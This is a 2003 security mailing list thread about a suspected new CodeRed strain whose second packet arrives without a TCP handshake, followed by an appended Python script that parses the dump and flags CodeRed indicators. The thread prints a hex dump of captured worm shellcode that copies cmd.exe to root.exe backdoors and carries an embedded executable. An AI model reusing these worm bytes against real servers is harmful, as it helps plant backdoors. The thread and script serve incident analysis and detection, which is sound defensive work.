RE: New CodeRed strain? -- UPDATE

From: larosa, vjay (larosa_vjayat_private)
Date: Tue Apr 29 2003 - 19:38:03 PDT


    AHA! I reported this about a month ago and everyone thought I was crazy! I
    have all sorts of packet captures of this kind of activity. There are
    cmd.exe attempts, root.exe attempts, and the classic default.ida?X and
    default.ida?N attempts, but no TCP three way handshake. It is very strange.
    These attempts are destined to IP addresses that are not even up and
    running, never mind they are all firewalled off from the outside. We should
    compare notes. If you want to you can contact me off the list.
    
    vjl
    
    -----Original Message-----
    From: Frank Knobbe [mailto:fknobbeat_private] 
    Sent: Monday, April 28, 2003 1:13 PM
    To: incidentsat_private
    Subject: Re: New CodeRed strain? -- UPDATE
    
    As I see it did make it to the list, here an update.
    
    The reason this packet hasn't been tripping the usual signatures is
    simple. We are receiving *only* the second packet. There is no first
    packet with GET /default.ida?XXXX etc.
    
    The packet itself appears to be classic CodeRed (II I believe), but
    again, we're getting only the second packet. No TCP 3-way, for first
    packet.
    
    While keeping our eyes on this, the majority appears to be coming from
    China, but we do some domestic (USA), Turkey, and I believe a Brazilian.
    
    I'm curious if anyone else is seeing these second-packet-only CodeReds.
    
    Regards,
    Frank
    
    
    
    On Fri, 2003-04-25 at 13:55, Frank Knobbe wrote:
    > Greetings,
    > 
    > we've been picking up some oddities since yesterday which look like a
    > new CodeRed variant. Traditional signatures didn't identify it as such,
    > but looking at the payload, it appears to be a CodeRed'ish type of bug.
    > We're starting a trap for a complete session now. (So far have only
    > isolated packets).
    > 
    > That isolated packet is below. I'll post the complete session once we
    > catch the whole thing. 
    > 
    > Has anyone else seen this?
    > 
    > Regards,
    > Frank
    > 
    > ---8<---
    > 
    > 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
    > TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
    > ***A**** Seq: 0xD7D856CE  Ack: 0xF3E3078  Win: 0x4470  TcpLen: 20
    > 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43  ..u..U..E......C
    > 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55  loseHandle..u..U
    > F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74  ..E......_lcreat
    > 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F  ..u..U..E......_
    > 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8  lwrite..u..U..E.
    > E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC  ....._lclose..u.
    > FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79  .U..E......GetSy
    > 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89  stemTime..u..U..
    > 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
    > 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
    > 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....
    > 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75  ..closesocket..u
    > BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74  ..U..E......ioct
    > 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45  lsocket..u..U..E
    > A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75  ......connect..u
    > BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65  ..U..E......sele
    > 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00  ct..u..U..E.....
    > 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8  .send..u..U..E..
    > 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89  ....recv..u..U..
    > 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61  E......gethostna
    > 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00  me..u..U..E.....
    > 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF  .gethostbyname..
    > 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41  u..U..E......WSA
    > 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC  GetLastError..u.
    > FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33  .U..E......USER3
    > 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00  2.DLL..U..E.....
    > 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF  .ExitWindowsEx..
    > 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84  u..U..E...E.i...
    > 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1  ..@.E....xV4....
    > C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3  ........<.t.<.t.
    > C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1  ................
    > E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8  ................
    > E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF  ......... ......
    > FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF  ................
    > FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04  .............Y..
    > 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F  .#...#.X........
    > 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3  t....t.;.X...t..
    > 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\...P.U..
    > BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\........\CMD.
    > 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....
    > 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\inetpub\scr
    > 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\root.exe...
    > 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8  $....\...P.U.j..
    > 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C  +...d:\progra~1\
    > 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C  common~1\system\
    > 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\root.exe..
    > 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA  .$....\...P.U...
    > 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
    > FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
    > 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
    > 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
    > 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00  ................
    > 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00  ............ ...
    > 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00  .@..............
    > 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00  ............@...
    > 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00  ................
    > 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10   ...............
    > 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C  ............0...
    > 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00  ................
    > 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10  ................
    > 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00  ................
    > 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00  .......... ..`..
    > 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04  ........... ....
    > 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00  ................
    > 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10  ..@.............
    > 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00  ...0............
    > 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC  ..........@.....
    > FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
    > FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
    > FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00  ................
    > 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68  ..........h....h
    > D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE  . @..a...... @..
    > 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8  . @.....j.h. @..
    > 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31  L........h.'...1
    > 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A  .....h.$@.h?...j
    > 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00  .h. @.h.....2...
    > 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68  ..u&j.hT @.j.j.h
    > 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF  H @..5.$@.......
    > 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68  5.$@..........h.$@.h
    > 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80  ?...j.hX @.h....
    > E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C  .......uU.. @..L
    > 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68  ..... @..B...j.h
    > B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8  . @.j.j.h. @..5.
    > 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A  $@......j.h. @.j
    > 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99  .j.h. @..5.$@...
    > 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7  ....5.$@........
    > 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0  ..$@.........h.$@.h.
    > 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40   @.h.$@.j.U.5.$@
    > 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B  ..`.....uI..$@..
    > C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81  .t@.. @..>.t6Ff.
    > 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20  ~.,,u...217.... 
    > 40 00 89 35                                      @..5
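As an added example (not part of this thread or anyone's posted code), a small Python triage script that parses the Snort-style dump quoted above and inspects the payload the way the discussion does: the TCP flags (ACK only, no SYN), the printable strings, the CodeRed II file names, and the embedded PE header. The dump excerpt it carries is a constructed subset of the quoted lines, and the indicator list is an assumption of this example.

```python
import re
# Constructed excerpt of the Snort dump quoted in the thread (two header
# lines plus seven payload lines), not the full capture.
SAMPLE_DUMP = r"""
> 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
> ***A**** Seq: 0xD7D856CE  Ack: 0xF3E3078  Win: 0x4470  TcpLen: 20
> BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\........\CMD.
> 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....
> 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\inetpub\scr
> 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\root.exe...
> 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
> 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
> 40 00 89 35                                      @..5
"""
# Strings the thread ties to this payload (assumed list); matched case-insensitively.
INDICATORS = ("default.ida", "cmd.exe", "root.exe", "inetpub\\scripts", "msadc")
HEX_LINE = re.compile(r"^\s*>?\s*((?:[0-9A-Fa-f]{2}\s)+)")
FLAGS_LINE = re.compile(r"^\s*>?\s*([*12UAPRSF]{8})\s+Seq:")

def parse_dump(dump: str):
    """Return (tcp_flags, payload) from a Snort-style packet dump."""
    flags, payload = "", bytearray()
    for line in dump.splitlines():
        m = FLAGS_LINE.match(line)
        if m:
            flags = m.group(1)
            continue
        m = HEX_LINE.match(line)
        if m:  # hex column only; the ASCII column is ignored
            payload += bytes.fromhex(m.group(1))
    return flags, bytes(payload)

def printable_strings(data: bytes, min_len: int = 4):
    """Runs of printable ASCII at least min_len long, as strings(1) does."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def analyze(dump: str) -> dict:
    flags, payload = parse_dump(dump)
    strings = printable_strings(payload)
    return {
        "flags": flags,
        # ACK set, SYN clear: a mid-stream data segment, so a rule keyed on the first GET never fires.
        "mid_stream": "A" in flags and "S" not in flags,
        "payload_len": len(payload),
        "strings": strings,
        "indicators": [i for i in INDICATORS if any(i in s.lower() for s in strings)],
        # MZ stub plus PE signature: the segment carries an executable.
        "embedded_pe": b"MZ" in payload and b"PE\x00\x00" in payload,
    }
```

Run `analyze(SAMPLE_DUMP)` on the excerpt and it reports a bare-ACK segment carrying `\CMD.EXE`, `d:\inetpub\scripts\root.exe` and a PE header, without ever seeing a `GET /default.ida` line.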
    